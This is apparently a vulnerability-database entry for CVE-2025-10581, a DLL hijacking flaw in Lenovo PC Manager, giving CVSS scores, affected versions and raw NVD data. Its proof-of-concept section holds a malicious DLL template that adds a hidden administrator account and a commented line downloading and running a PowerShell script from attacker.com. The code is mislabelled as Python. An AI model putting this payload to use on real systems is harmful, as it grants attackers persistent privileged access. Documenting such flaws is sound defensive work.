Security Vulnerability Report
中文
CVE-2025-10581 CVSS 7.8 HIGH

CVE-2025-10581

Published: 2025-10-15 15:16:03
Last Modified: 2026-02-02 15:36:33

Description

A potential DLL hijacking vulnerability was discovered in the Lenovo PC Manager during an internal security assessment that could allow a local authenticated user to execute code with elevated privileges.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:lenovo:pcmanager:*:*:*:*:*:*:*:* - VULNERABLE
Lenovo PC Manager - 具体受影响版本请参考联想官方安全公告

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10581 - Lenovo PC Manager DLL Hijacking PoC # This is a conceptual proof-of-concept for DLL hijacking vulnerability # Compile as a DLL and place it in the Lenovo PC Manager search path #include <windows.h> #include <stdio.h> // Export the same functions as the legitimate DLL // The DLL name should match a DLL loaded by Lenovo PC Manager BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID lpReserved) { switch (reason) { case DLL_PROCESS_ATTACH: // Disable thread notifications for performance DisableThreadLibraryCalls(hModule); // Execute malicious payload with elevated privileges // Since Lenovo PC Manager runs with high privileges, // the payload executes in the same security context // Example: Create a new admin user system("net user hacker P@ssw0rd! /add"); system("net localgroup administrators hacker /add"); // Alternative: Reverse shell or other persistence mechanism // WinExec("powershell -ep bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')\"", SW_HIDE); break; case DLL_PROCESS_DETACH: break; } return TRUE; } // Export the original DLL's functions to maintain normal application behavior // __declspec(dllexport) returntype FunctionName(parameters) { ... }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10581", "sourceIdentifier": "[email protected]", "published": "2025-10-15T15:16:03.147", "lastModified": "2026-02-02T15:36:32.923", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A potential DLL hijacking vulnerability was discovered in the Lenovo PC Manager during an internal security assessment that could allow a local authenticated user to execute code with elevated privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lenovo:pcmanager:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.1.140.9262", "matchCriteriaId": "8D67CF0D-6B4B-401C-8DB1-BB59E680F207"}]}]}], "references": [{"url": "https://iknow.lenovo.com.cn/detail/432378", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}